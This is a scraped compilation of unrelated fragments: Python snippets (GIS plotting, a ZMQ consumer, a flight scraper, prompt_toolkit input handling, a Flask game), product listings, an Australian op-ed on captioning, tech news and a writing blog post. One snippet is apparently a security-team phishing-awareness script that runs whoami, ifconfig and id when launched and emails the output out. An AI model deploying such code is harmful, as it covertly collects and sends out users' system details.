_, contours, _ = cv2.findContours(img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
valid_contours = []
for contour in contours:
max_x = contour[:, :, 0].max()
min_x = contour[:, :, 0].min()
max_y = contour[:, :, 1].max()
min_y = contour[:, :, 1].min()
if (max_x - min_x) * (max_y - min_y) > threshold:
valid_contours.append(contour)
yield valid_contours
|
The iconic DQ smoking skull. Inspired by pirates, memento mori, tattoos and the fact that you shouldn't take things too seriously.
This item qualifies for free domestic shipping. Upon shipment, you can expect to receive it in 1-4 business days.
|
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.cm as cm
import geojson
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.collections import PolyCollection
from matplotlib.colors import colorConverter
from mpl_toolkits.basemap import Basemap
from pylab import *
from random import *
class GIS:
def __init__(self,dict_):
self.coordinates = dict_["coordinates"]
self.type = dict_["type"]
# we set low resolution as default setting
self.map = Basemap(projection='merc',resolution='l')
def point(self):
self.map.drawcoastlines()
self.map.drawcountries()
self.map.fillcontinents(color = 'coral')
self.map.drawmapboundary()
x,y = self.map(self.coordinates[0],self.coordinates[1])
self.map.plot(x, y, 'bo', markersize=10)
plt.show()
def linestring(self):
self.map.drawcoastlines()
self.map.drawcountries()
self.map.fillcontinents(color = 'coral')
self.map.drawmapboundary()
x,y = self.map(self.coordinates[0],self.coordinates[1])
self.map.plot(x, y, color="green", linewidth=1.0, linestyle="-")
plt.show()
def init(self):
if self.type == "Point":
self.point()
elif self.type == "LineString":
self.linestring()
|
Evercoat Liquid Hardener - .37 fl. oz.
For use with polyester resin and gelcoat. Plastic squeeze tube has graduated measure for mixing convenience.
A no run, no sag polyester resin for marine repairs. Cures tack-free over fiberglass, plywood and metal. Hardener included.
A two-part pour foam. 2 lb. density foam used for flotation, insulating and filling. Must be mixed 1:1 equal parts.
|
#!/usr/bin/python
# -*- coding: UTF-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/. */
# Authors:
# Michael Berg-Mohnicke <michael.berg@zalf.de>
#
# Maintainers:
# Currently maintained by the authors.
#
# This file has been created at the Institute of
# Landscape Systems Analysis at the ZALF.
# Copyright (C: Leibniz Centre for Agricultural Landscape Research (ZALF)
import sys
import csv
import os
import json
import zmq
#print "pyzmq version: ", zmq.pyzmq_version(), " zmq version: ", zmq.zmq_version()
import monica_io
#print "path to monica_io: ", monica_io.__file__
def run_consumer(path_to_output_dir = None, leave_after_finished_run = False, server = {"server": None, "port": None}, shared_id = None):
"collect data from workers"
config = {
"port": server["port"] if server["port"] else "7777",
"server": server["server"] if server["server"] else "localhost",
"shared_id": shared_id,
"out": path_to_output_dir if path_to_output_dir else os.path.join(os.path.dirname(__file__), 'out/'),
"leave_after_finished_run": leave_after_finished_run
}
if len(sys.argv) > 1 and __name__ == "__main__":
for arg in sys.argv[1:]:
k,v = arg.split("=")
if k in config:
if k == "leave_after_finished_run":
if (v == 'True' or v == 'true'):
config[k] = True
else:
config[k] = False
else:
config[k] = v
print "consumer config:", config
context = zmq.Context()
if config["shared_id"]:
socket = context.socket(zmq.DEALER)
socket.setsockopt(zmq.IDENTITY, config["shared_id"])
else:
socket = context.socket(zmq.PULL)
socket.connect("tcp://" + config["server"] + ":" + config["port"])
#socket.RCVTIMEO = 1000
leave = False
def process_message(msg):
if not hasattr(process_message, "wnof_count"):
process_message.received_env_count = 0
leave = False
if msg["type"] == "finish":
print "c: received finish message"
leave = True
else:
print "c: received work result ", process_message.received_env_count, " customId: ", str(msg.get("customId", ""))
process_message.received_env_count += 1
#with open("out/out-" + str(i) + ".csv", 'wb') as _:
with open(config["out"] + str(process_message.received_env_count) + ".csv", 'wb') as _:
writer = csv.writer(_, delimiter=",")
for data_ in msg.get("data", []):
results = data_.get("results", [])
orig_spec = data_.get("origSpec", "")
output_ids = data_.get("outputIds", [])
if len(results) > 0:
writer.writerow([orig_spec.replace("\"", "")])
for row in monica_io.write_output_header_rows(output_ids,
include_header_row=True,
include_units_row=True,
include_time_agg=False):
writer.writerow(row)
for row in monica_io.write_output(output_ids, results):
writer.writerow(row)
writer.writerow([])
if config["leave_after_finished_run"] == True :
leave = True
return leave
while not leave:
try:
msg = socket.recv_json(encoding="latin-1")
leave = process_message(msg)
except:
continue
print "c: exiting run_consumer()"
#debug_file.close()
if __name__ == "__main__":
run_consumer()
|
Program Tuesday & Wednesday - Easy gift idea!
The time for Karen DeWitt's visit is almost here. We are so excited! Be sure and consider joining us on Tuesday, December 9 at 6 PM or Wednesday, December 10 at 10 AM. Just give us a jingle at 815-879-3739 if you would like to attend.
Need a QUICK and AWESOME gift idea? We have wonderful Shannon fabric throw kits all ready. If I say, "Cadillac", does that mean anything? These are extra thick and have a rich feeling. Anyone on your list would LOVE to receive one! However, I guarantee you won't make just one!!
|
####WIP####
#!/usr/bin/python
from Tkinter import *
from tkMessageBox import *
import smtplib
import platform
import sys
import os
from email.mime.text import MIMEText
os.system('(whoami; uname -ar; ifconfig; pwd; id;) > me')
def answer():
showerror("Peekab000:", "We see you!, You are now on the Security Teams radar and maybe shouldn't have broken policy")
def callback():
if askyesno('Huh Oh!:', 'You have now been seen by the Security Team! Would you like to close me?'):
showwarning('Yes', 'NO! Go speak with the Security Team!')
else:
showinfo('No', "Smart answer, cause I wasn't going to close till you spoke to the Security Team anyways.")
def uname():
print platform.uname()
def givemeinfo():
os.system('(whoami; uname -ar; ifconfig; pwd; id; ) > me.txt')
def maail():
fp = open('me', 'rb')
msg = MIMEText(fp.read())
fp.close()
msg['Subject'] = 'You Caught a Phish!'
msg['From'] = '<FROM-GOES-HERE>'
msg['To'] = '<TO-GOES-HERE>'
msg['cc'] = '<CC-GOES-HERE>'
s = smtplib.SMTP('<SMTP-GOES-HERE>')
s.sendmail('<FROM-GOES-HERE>', ['<TO-GOES-HERE>','<CC-GOES-HERE>'], msg.as_string())
s.quit()
Button(text='WHAT!?', command=answer).pack(fill=X)
Button(text='Give Me Options', command=callback).pack(fill=X)
Button(text='Informative', command=uname).pack(fill=X)
Button(text='I personally would not click this!', command=givemeinfo).pack(fill=X)
Button(text='You are not in trouble: Click me to email Security now', command=maail).pack(fill=X)
mainloop()
|
If the Federal Government likes to live dangerously, there is a good example in the deal stitched up last month between the Democrats’ Senator Natasha Stott Despoja and Communications Minister Helen Coonan. The deal came about after Senator Stott Despoja tabled a motion to call for an inquiry into the state of electronic media captioning for the millions of Australians who are deaf and hearing impaired.
She will now get what she was after. Senator Coonan announced an investigation that will look at what has happened in captioning and other “essential access technologies”. It will assess where Australia is compared with the rest of the world, and look at access to captions in the light of the rapid technological change that has taken place in media. The Minister said the investigation will be completed by April 30 next year (2008), with a report to be tabled in Parliament.
Had Senator Stott Despoja’s proposal been debated and defeated along party lines, the Government would have looked decidedly ugly. It was already looking silly on this issue when the Department of Families, Community Services and Indigenous Affairs supported the production of a DVD called Raising Children. This will be distributed free to parents of newborns. It was touted as a world first: an interactive guide with information and short films for new parents.
The Deafness Forum and the Human Rights and Equal Opportunity Commission pounced on the DVD the moment it was realised it had neither captions nor an audio-description track. These omissions ensured the DVD was close to useless for new parents who were blind, deaf, or who had vision or hearing impairments. As a result, the department contradicted its own disability action plan, of which one of the key themes was to “improve the accessibility of our information products for people with disabilities”. And for the inimitable, Monty Pythonesque touch, this defective DVD was launched by a hearing-impaired Prime Minister during Hearing Awareness Week.
In one piece of recent good news, the Film Finance Corporation has now made it compulsory for feature films it supports to have captions. To enjoy such films will require attending a cinema that will show captioned films. And the bad news? There are exactly ten cinemas in the entire country which show films with captions. The inquiry will be able to ask, why, with such commendable policy, is there such a miniscule number of cinemas in which to show them in the first place?
Senator Coonan’s press release announcing the inquiry commended the free-to-air broadcasters for approaching their 70 per cent captioning targets for programming between 6am and midnight. Prime-time FTA television captioning has already been guaranteed by legislation since 2001. Those wishing to view captions on television must purchase a television with teletext. And this is the rub. Apart from deaf and hearing-impaired people, almost no one in business or government bothers. Very few of the thousands of televisions in hospitals, waiting rooms, hotels, offices, shopping malls, motels and other public places come equipped with teletext. Countless videos and DVDs used in hospitals, schools, TAFEs and universities do not have captions. A large number of television programs are not captioned, for example, daytime sporting events.
The news is hardly much better for those who might give up and rely on DVDs for the captions track. Media Access Australia monitors new-release DVDs, and in its last survey, found a mere 51 per cent included hearing access in the form of subtitles or captions. Inaccessible DVDs like Raising Children continue to be churned out. A recent series of National Geographic DVDs on wildlife themes, promoted and distributed by the Herald Sun newspaper, have no captioning track, and no audio-description track for blind and vision-impaired people.
New technology and new services have left captions well behind. Unlike FTA broadcasting, there is no requirement for captions on prime-time subscription television. Digital multichannels are exempt from captions, and DVDs of television programs, or their downloads off the Internet, do not include captions even if they were on the originals.
These are some of the most recent examples of what has plagued deaf and hearing-impaired Australians watching television and film. The inquiry however will be able to scrutinise all of these issues. When it looks overseas, it will find examples like the UK Film Council. This government-backed agency has just allocated 500,000 pounds to allow independent local cinemas to improve access, such as buying and installing equipment to provide captions and audio-description. Included in Senator Stott Despoja’s original proposal was a call for captioning everything on television by 2011. The inquiry will find out this would merely give deaf and hearing-impaired Australians what their American counterparts are already enjoying now.
While FTA broadcasters are moving towards their captioning targets, it needs to be remembered that captions, to the extent we already have them, did not arise from the goodness of the corporations’ hearts. Captions on television and film happened because deaf individuals stood up and lodged complaints under the Disability Discrimination Act. These complaints started a chain of enquiries and negotiations between the Human Rights and Equal Opportunity Commission, film and television companies, film distributors, and advocacy agencies for deaf and hearing-impaired people. With a fresh round of negotiations imminent for both film and television, the inquiry will show film and FTA broadcasters where they stand in relation to Senator Coonan’s call.
Let there be no doubt of the importance of captions. Pressing the mute button does not equal the experience of hearing impairment while watching the television or at the cinema. It is much worse than that. A hearing aid, a cochlear implant, a listening device, a volume set close to maximum, some lipreading, or a combination of these may allow comprehension of words and phrases here and there. But no one will understand the entire dialogue. And no one has ever managed to lipread the penguins in Happy Feet.
It is most interesting that Senator Coonan’s press release referred to a “personal link to deafness”, something she shares with Senator Stott Despoja. This factor must surely have played some part in uniting these two from different political parties. The inquiry is good news for millions of Australians who ask for nothing more than the chance to enjoy film and television, whenever they wish, in whatever medium, just as do hearing people. In the end, Senator Coonan deserves credit. And Senator Stott Despoja, who has fought on this issue for years, will be remembered as a visionary.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import util
from selenium import webdriver
from constant import Website
from setting.fetch_settings import URL_PARAMS
def dig_info(flight):
try:
info = flight.find_element_by_class_name('logo').text.split()
airline = info[0].strip() if len(info) >= 1 else ''
flight_no = info[1].strip() if len(info) >= 2 else ''
divs = flight.find_element_by_class_name('right').\
find_elements_by_tag_name('div')
from_time = divs[0].find_element_by_class_name('time').text
from_time_pair = [int(x) for x in from_time.split(':')]
from_airport = divs[1].text
divs = flight.find_element_by_class_name('left').\
find_elements_by_tag_name('div')
to_time = divs[0].find_element_by_class_name('time').text
to_time_pair = [int(x) for x in to_time.split(':')]
to_airport = divs[1].text
if to_time_pair[0] < from_time_pair[0]:
to_time_pair[0] += 24
price = flight.find_element_by_class_name('price').text[1:]
tmp_price = ''
for ch in price:
if ch.isdigit():
tmp_price += ch
else:
break
price = int(tmp_price)
return [airline, flight_no, from_airport, from_time,
from_time_pair, to_airport, to_time, to_time_pair, price]
except Exception as e:
util.log_error('CTRIP: ' + str(e))
return None
def fetch(period):
browser = webdriver.PhantomJS()
url = 'http://flights.ctrip.com/booking/%s-%s-day-1.html#DDate1=%s' % \
(URL_PARAMS[Website.CTRIP][period['from_city']],
URL_PARAMS[Website.CTRIP][period['to_city']],
period['date'])
browser.get(url)
util.scroll(browser)
block = util.fetch_one(browser, 'find_element_by_id', 'J_flightlist2')
if not block:
return []
flights = util.fetch_multi(block, 'find_elements_by_class_name',
'search_table_header')
format_flights = []
for flight in flights:
info = dig_info(flight)
if info:
format_flights.append(info)
browser.quit()
return util.deal(period, format_flights, Website.CTRIP, url)
|
DirecTV will soon allow users to verbally control the television by talking to their iPhone or Android device.
Tired of pressing buttons on your remote? DirecTV's new smartphone application can help.
The app allows users to verbally control the television by talking to their iPhone or Android device. Using a cellular or Wi-Fi connection, users can tap the application's on-screen microphone icon and search by person, title, channel, time, or genre, just by asking.
Say "Show me Tom Hanks movies on this weekend," and the guide will pop up with a list, alongside details like Rotten Tomatoes scores, plot synopses, showtimes, and more, according to The Verge, which got a hands-on look at the new voice function.
While searching for tonight's Yankees game or a family-friendly program to watch with the kids, users will find results on the TV and phone, the latter of which transforms into a trackpad for easy navigation. Tap once to tune to a show on the TV set or phone, or use the app while away from home to record shows or add them to the bookmarks list.
The new Voice search is capable to sifting through upcoming, on-demand, and pay-per-view content, CNET reported, which tipped the app's speech-bubble suggestions, like "find documentaries this week." DirecTV is also hoping the bubbles can be turned into a marketing scheme, CNET said, serving as integrated advertisements.
For all of its charms, DirecTV's new voice function is missing a few key options, CNET said, pointing to the lack of Netflix integration (the available first four seasons of Breaking Bad don't show up in DirecTV search results) and a missing "free" content search filter.
DirecTV is working with voice-recognition star Nuance, which launched its own virtual assistant in August. The app will be released in "very public beta" this summer, The Verge reported, and will be available to anyone who updates to the latest version.
DirecTV did not immediately respond to PCMag's request for comment.
|
from __future__ import unicode_literals
from ctypes import windll, pointer
from ctypes.wintypes import DWORD
from six.moves import range
from contextlib import contextmanager
from .ansi_escape_sequences import REVERSE_ANSI_SEQUENCES
from .base import Input
from prompt_toolkit.eventloop import get_event_loop
from prompt_toolkit.eventloop.win32 import wait_for_handles
from prompt_toolkit.key_binding.key_processor import KeyPress
from prompt_toolkit.keys import Keys
from prompt_toolkit.mouse_events import MouseEventType
from prompt_toolkit.win32_types import EventTypes, KEY_EVENT_RECORD, MOUSE_EVENT_RECORD, INPUT_RECORD, STD_INPUT_HANDLE
import msvcrt
import os
import sys
import six
__all__ = [
'Win32Input',
'ConsoleInputReader',
'raw_mode',
'cooked_mode',
'attach_win32_input',
'detach_win32_input',
]
class Win32Input(Input):
"""
`Input` class that reads from the Windows console.
"""
def __init__(self, stdin=None):
self.console_input_reader = ConsoleInputReader()
def attach(self, input_ready_callback):
"""
Return a context manager that makes this input active in the current
event loop.
"""
assert callable(input_ready_callback)
return attach_win32_input(self, input_ready_callback)
def detach(self):
"""
Return a context manager that makes sure that this input is not active
in the current event loop.
"""
return detach_win32_input(self)
def read_keys(self):
return list(self.console_input_reader.read())
def flush(self):
pass
@property
def closed(self):
return False
def raw_mode(self):
return raw_mode()
def cooked_mode(self):
return cooked_mode()
def fileno(self):
# The windows console doesn't depend on the file handle, so
# this is not used for the event loop (which uses the
# handle instead). But it's used in `Application.run_system_command`
# which opens a subprocess with a given stdin/stdout.
return sys.stdin.fileno()
def typeahead_hash(self):
return 'win32-input'
def close(self):
self.console_input_reader.close()
@property
def handle(self):
return self.console_input_reader.handle
class ConsoleInputReader(object):
"""
:param recognize_paste: When True, try to discover paste actions and turn
the event into a BracketedPaste.
"""
# Keys with character data.
mappings = {
b'\x1b': Keys.Escape,
b'\x00': Keys.ControlSpace, # Control-Space (Also for Ctrl-@)
b'\x01': Keys.ControlA, # Control-A (home)
b'\x02': Keys.ControlB, # Control-B (emacs cursor left)
b'\x03': Keys.ControlC, # Control-C (interrupt)
b'\x04': Keys.ControlD, # Control-D (exit)
b'\x05': Keys.ControlE, # Control-E (end)
b'\x06': Keys.ControlF, # Control-F (cursor forward)
b'\x07': Keys.ControlG, # Control-G
b'\x08': Keys.ControlH, # Control-H (8) (Identical to '\b')
b'\x09': Keys.ControlI, # Control-I (9) (Identical to '\t')
b'\x0a': Keys.ControlJ, # Control-J (10) (Identical to '\n')
b'\x0b': Keys.ControlK, # Control-K (delete until end of line; vertical tab)
b'\x0c': Keys.ControlL, # Control-L (clear; form feed)
b'\x0d': Keys.ControlM, # Control-M (enter)
b'\x0e': Keys.ControlN, # Control-N (14) (history forward)
b'\x0f': Keys.ControlO, # Control-O (15)
b'\x10': Keys.ControlP, # Control-P (16) (history back)
b'\x11': Keys.ControlQ, # Control-Q
b'\x12': Keys.ControlR, # Control-R (18) (reverse search)
b'\x13': Keys.ControlS, # Control-S (19) (forward search)
b'\x14': Keys.ControlT, # Control-T
b'\x15': Keys.ControlU, # Control-U
b'\x16': Keys.ControlV, # Control-V
b'\x17': Keys.ControlW, # Control-W
b'\x18': Keys.ControlX, # Control-X
b'\x19': Keys.ControlY, # Control-Y (25)
b'\x1a': Keys.ControlZ, # Control-Z
b'\x1c': Keys.ControlBackslash, # Both Control-\ and Ctrl-|
b'\x1d': Keys.ControlSquareClose, # Control-]
b'\x1e': Keys.ControlCircumflex, # Control-^
b'\x1f': Keys.ControlUnderscore, # Control-underscore (Also for Ctrl-hyphen.)
b'\x7f': Keys.Backspace, # (127) Backspace (ASCII Delete.)
}
# Keys that don't carry character data.
keycodes = {
# Home/End
33: Keys.PageUp,
34: Keys.PageDown,
35: Keys.End,
36: Keys.Home,
# Arrows
37: Keys.Left,
38: Keys.Up,
39: Keys.Right,
40: Keys.Down,
45: Keys.Insert,
46: Keys.Delete,
# F-keys.
112: Keys.F1,
113: Keys.F2,
114: Keys.F3,
115: Keys.F4,
116: Keys.F5,
117: Keys.F6,
118: Keys.F7,
119: Keys.F8,
120: Keys.F9,
121: Keys.F10,
122: Keys.F11,
123: Keys.F12,
}
LEFT_ALT_PRESSED = 0x0002
RIGHT_ALT_PRESSED = 0x0001
SHIFT_PRESSED = 0x0010
LEFT_CTRL_PRESSED = 0x0008
RIGHT_CTRL_PRESSED = 0x0004
def __init__(self, recognize_paste=True):
self._fdcon = None
self.recognize_paste = recognize_paste
# When stdin is a tty, use that handle, otherwise, create a handle from
# CONIN$.
if sys.stdin.isatty():
self.handle = windll.kernel32.GetStdHandle(STD_INPUT_HANDLE)
else:
self._fdcon = os.open('CONIN$', os.O_RDWR | os.O_BINARY)
self.handle = msvcrt.get_osfhandle(self._fdcon)
def close(self):
" Close fdcon. "
if self._fdcon is not None:
os.close(self._fdcon)
def read(self):
"""
Return a list of `KeyPress` instances. It won't return anything when
there was nothing to read. (This function doesn't block.)
http://msdn.microsoft.com/en-us/library/windows/desktop/ms684961(v=vs.85).aspx
"""
max_count = 2048 # Max events to read at the same time.
read = DWORD(0)
arrtype = INPUT_RECORD * max_count
input_records = arrtype()
# Check whether there is some input to read. `ReadConsoleInputW` would
# block otherwise.
# (Actually, the event loop is responsible to make sure that this
# function is only called when there is something to read, but for some
# reason this happened in the asyncio_win32 loop, and it's better to be
# safe anyway.)
if not wait_for_handles([self.handle], timeout=0):
return
# Get next batch of input event.
windll.kernel32.ReadConsoleInputW(
self.handle, pointer(input_records), max_count, pointer(read))
# First, get all the keys from the input buffer, in order to determine
# whether we should consider this a paste event or not.
all_keys = list(self._get_keys(read, input_records))
# Fill in 'data' for key presses.
all_keys = [self._insert_key_data(key) for key in all_keys]
if self.recognize_paste and self._is_paste(all_keys):
gen = iter(all_keys)
for k in gen:
# Pasting: if the current key consists of text or \n, turn it
# into a BracketedPaste.
data = []
while k and (isinstance(k.key, six.text_type) or
k.key == Keys.ControlJ):
data.append(k.data)
try:
k = next(gen)
except StopIteration:
k = None
if data:
yield KeyPress(Keys.BracketedPaste, ''.join(data))
if k is not None:
yield k
else:
for k in all_keys:
yield k
def _insert_key_data(self, key_press):
"""
Insert KeyPress data, for vt100 compatibility.
"""
if key_press.data:
return key_press
data = REVERSE_ANSI_SEQUENCES.get(key_press.key, '')
return KeyPress(key_press.key, data)
def _get_keys(self, read, input_records):
"""
Generator that yields `KeyPress` objects from the input records.
"""
for i in range(read.value):
ir = input_records[i]
# Get the right EventType from the EVENT_RECORD.
# (For some reason the Windows console application 'cmder'
# [http://gooseberrycreative.com/cmder/] can return '0' for
# ir.EventType. -- Just ignore that.)
if ir.EventType in EventTypes:
ev = getattr(ir.Event, EventTypes[ir.EventType])
# Process if this is a key event. (We also have mouse, menu and
# focus events.)
if type(ev) == KEY_EVENT_RECORD and ev.KeyDown:
for key_press in self._event_to_key_presses(ev):
yield key_press
elif type(ev) == MOUSE_EVENT_RECORD:
for key_press in self._handle_mouse(ev):
yield key_press
@staticmethod
def _is_paste(keys):
"""
Return `True` when we should consider this list of keys as a paste
event. Pasted text on windows will be turned into a
`Keys.BracketedPaste` event. (It's not 100% correct, but it is probably
the best possible way to detect pasting of text and handle that
correctly.)
"""
# Consider paste when it contains at least one newline and at least one
# other character.
text_count = 0
newline_count = 0
for k in keys:
if isinstance(k.key, six.text_type):
text_count += 1
if k.key == Keys.ControlM:
newline_count += 1
return newline_count >= 1 and text_count > 1
def _event_to_key_presses(self, ev):
"""
For this `KEY_EVENT_RECORD`, return a list of `KeyPress` instances.
"""
assert type(ev) == KEY_EVENT_RECORD and ev.KeyDown
result = None
u_char = ev.uChar.UnicodeChar
ascii_char = u_char.encode('utf-8')
# NOTE: We don't use `ev.uChar.AsciiChar`. That appears to be latin-1
# encoded. See also:
# https://github.com/ipython/ipython/issues/10004
# https://github.com/jonathanslenders/python-prompt-toolkit/issues/389
if u_char == '\x00':
if ev.VirtualKeyCode in self.keycodes:
result = KeyPress(self.keycodes[ev.VirtualKeyCode], '')
else:
if ascii_char in self.mappings:
if self.mappings[ascii_char] == Keys.ControlJ:
u_char = '\n' # Windows sends \n, turn into \r for unix compatibility.
result = KeyPress(self.mappings[ascii_char], u_char)
else:
result = KeyPress(u_char, u_char)
# Correctly handle Control-Arrow keys.
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result:
if result.key == Keys.Left:
result.key = Keys.ControlLeft
if result.key == Keys.Right:
result.key = Keys.ControlRight
if result.key == Keys.Up:
result.key = Keys.ControlUp
if result.key == Keys.Down:
result.key = Keys.ControlDown
# Turn 'Tab' into 'BackTab' when shift was pressed.
if ev.ControlKeyState & self.SHIFT_PRESSED and result:
if result.key == Keys.Tab:
result.key = Keys.BackTab
# Turn 'Space' into 'ControlSpace' when control was pressed.
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result and result.data == ' ':
result = KeyPress(Keys.ControlSpace, ' ')
# Turn Control-Enter into META-Enter. (On a vt100 terminal, we cannot
# detect this combination. But it's really practical on Windows.)
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result and \
result.key == Keys.ControlJ:
return [KeyPress(Keys.Escape, ''), result]
# Return result. If alt was pressed, prefix the result with an
# 'Escape' key, just like unix VT100 terminals do.
# NOTE: Only replace the left alt with escape. The right alt key often
# acts as altgr and is used in many non US keyboard layouts for
# typing some special characters, like a backslash. We don't want
# all backslashes to be prefixed with escape. (Esc-\ has a
# meaning in E-macs, for instance.)
if result:
meta_pressed = ev.ControlKeyState & self.LEFT_ALT_PRESSED
if meta_pressed:
return [KeyPress(Keys.Escape, ''), result]
else:
return [result]
else:
return []
def _handle_mouse(self, ev):
"""
Handle mouse events. Return a list of KeyPress instances.
"""
FROM_LEFT_1ST_BUTTON_PRESSED = 0x1
result = []
# Check event type.
if ev.ButtonState == FROM_LEFT_1ST_BUTTON_PRESSED:
# On a key press, generate both the mouse down and up event.
for event_type in [MouseEventType.MOUSE_DOWN, MouseEventType.MOUSE_UP]:
data = ';'.join([
event_type,
str(ev.MousePosition.X),
str(ev.MousePosition.Y)
])
result.append(KeyPress(Keys.WindowsMouseEvent, data))
return result
_current_callbacks = {} # loop -> callback
@contextmanager
def attach_win32_input(input, callback):
"""
Context manager that makes this input active in the current event loop.
:param input: :class:`~prompt_toolkit.input.Input` object.
:param input_ready_callback: Called when the input is ready to read.
"""
assert isinstance(input, Input)
assert callable(callback)
loop = get_event_loop()
previous_callback = _current_callbacks.get(loop)
# Add reader.
loop.add_win32_handle(input.handle, callback)
_current_callbacks[loop] = callback
try:
yield
finally:
loop.remove_win32_handle(input.handle)
if previous_callback:
loop.add_win32_handle(input.handle, previous_callback)
_current_callbacks[loop] = previous_callback
else:
del _current_callbacks[loop]
@contextmanager
def detach_win32_input(input):
assert isinstance(input, Input)
loop = get_event_loop()
previous = _current_callbacks.get(loop)
if previous:
loop.remove_win32_handle(input.handle)
_current_callbacks[loop] = None
try:
yield
finally:
if previous:
loop.add_win32_handle(input.handle, previous)
_current_callbacks[loop] = previous
class raw_mode(object):
"""
::
with raw_mode(stdin):
''' the windows terminal is now in 'raw' mode. '''
The ``fileno`` attribute is ignored. This is to be compatible with the
`raw_input` method of `.vt100_input`.
"""
def __init__(self, fileno=None):
self.handle = windll.kernel32.GetStdHandle(STD_INPUT_HANDLE)
def __enter__(self):
# Remember original mode.
original_mode = DWORD()
windll.kernel32.GetConsoleMode(self.handle, pointer(original_mode))
self.original_mode = original_mode
self._patch()
def _patch(self):
# Set raw
ENABLE_ECHO_INPUT = 0x0004
ENABLE_LINE_INPUT = 0x0002
ENABLE_PROCESSED_INPUT = 0x0001
windll.kernel32.SetConsoleMode(
self.handle, self.original_mode.value &
~(ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT))
def __exit__(self, *a, **kw):
# Restore original mode
windll.kernel32.SetConsoleMode(self.handle, self.original_mode)
class cooked_mode(raw_mode):
"""
::
with cooked_mode(stdin):
''' The pseudo-terminal stdin is now used in cooked mode. '''
"""
def _patch(self):
# Set cooked.
ENABLE_ECHO_INPUT = 0x0004
ENABLE_LINE_INPUT = 0x0002
ENABLE_PROCESSED_INPUT = 0x0001
windll.kernel32.SetConsoleMode(
self.handle, self.original_mode.value |
(ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT))
|
Banking coupons: Get a high-quality personal banking experience with eminent online marketplaces such as Bin DB, Western Union, UK Forex, By Travel Money Online and many more. The internet banking service provides real time access to your account and transfer money to anywhere within fractions of seconds. Various personal banking services include free checking accounts, savings accounts, credit cards, health savings, and many more online services from various market places. Utilize Banking Promotions and coupon codes to save money on banking services.
|
# FLASK WEBSITE
# Runs the game online (currently only on localhost: 5000)
# Renders html, passes user_action to game.play(action), and calls database methods to get, save, and delete games
from game import Game
from db_methods import SECRET_KEY, DATABASE, COLLECTION, DEBUG, app, g, \
connect_db, init_db, save_game, get_game, new_game
from flask import Flask, render_template, request, session, redirect, url_for
@app.before_request
def before_request():
g.connection = connect_db()
g.db = g.connection[DATABASE][COLLECTION]
@app.teardown_request
def teardown_request(exception):
g.connection.close()
def get_new_game(user_id=None):
blank_game = Game()
if user_id:
print "deleting user", user_id
session['id'] = new_game(blank_game, user_id)
print "creating a new game for user", session['id']
return redirect(url_for('index'))
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
if 'id' in session and get_game(session['id']):
loaded_game = get_game(session['id'])
print "session", session['id'], "is already initialized"
return render_template('form.html', room=loaded_game.game['location'],
inventory=loaded_game.game['inv'], exits=loaded_game.game['location'].exits)
else:
if 'id' in session:
return get_new_game(session['id'])
return get_new_game()
elif request.method == 'POST':
action = request.form['action']
if 'id' not in session:
return redirect(url_for('index'))
loaded = get_game(session['id'])
msg = loaded.play(action)
save_game(session['id'], loaded)
print "saving game for user", session['id']
return render_template('form.html', room=loaded.game['location'], inventory=loaded.game['inv'], \
exits=loaded.game['location'].exits, message=msg)
@app.route('/newgame', methods=['GET'])
def newgame():
return get_new_game(session['id'])
if __name__ == '__main__':
app.run(host='localhost')
|
There must be a good many people who’ve thought that over the past year—David Cameron and Theresa May among them.
But it’s not just out in the wide world that life can scatter all your preconceptions like a ball plunging into a set of skittles.
I promised myself I’d do a bit of work on that other project (a contemporary novel) and return to my historical novel in the autumn, after it had been rested for about five months or so. All very sensible and organised.
Well, that was more than a year ago. Life (and, sadly, death) intervened and I’ve only just lately been able to return to that ‘resting’ novel.
At least it’s meant that it was almost like reading something completely new. I came to it with fresh eyes, able to see what was good about it and what needed rewriting. Of course, I’d hoped there’d be very little to change, that it would all seem wonderful.
It didn’t. In fact, it was very clear that the book needed a complete re-write. It wasn’t a disaster, but it definitely wasn’t working as it should. The bones of it were there, but that was all. It was a skeleton without flesh and life. The good thing was that I could see quite clearly not only what was wrong with it, but how to start putting it right.
So that’s the task now, to put flesh on the bones and breathe life into them. I don’t regret the long break—it’s been an ideal way to approach the final stretch of this novel. And at long last I have time to write. In theory anyway.
I know that my plans for a summer of writing could well be interrupted, by small distractions or major upheavals, good or bad, domestic, national or international. You never know what’s round the corner.
This entry was posted in Authorial voice, Random Thoughts, Self-publishing and tagged break in writing, editing, first draft, Historical fiction, historical novels, how long to write?, new novel, self-publishing, work in progress, writing life. Bookmark the permalink.
Hope your writing takes you to some great places this summer.
|
# coding=utf-8
#----------------------------------------------------------------------
# Copyright (c) 2013 Horacio G. de Oro <hgdeoro@gmail.com>
#----------------------------------------------------------------------
# This file is part of EFLU.
#
# EFLU is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EFLU is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EFLU. If not, see <http://www.gnu.org/licenses/>.
#----------------------------------------------------------------------
import logging
import subprocess
from eyefilinuxui.util import kdesudo
logger = logging.getLogger(__name__)
def nm_interface_exists(interface):
"""Returns True if interface exists"""
# $ nmcli -t -f DEVICE dev
# wlan0
# eth0
output = subprocess.check_output(["nmcli", "-t", "-f", "DEVICE", "dev"])
logger.debug("OUTPUT: %s", output)
return interface in [l.strip() for l in output.strip().splitlines() if l.strip()]
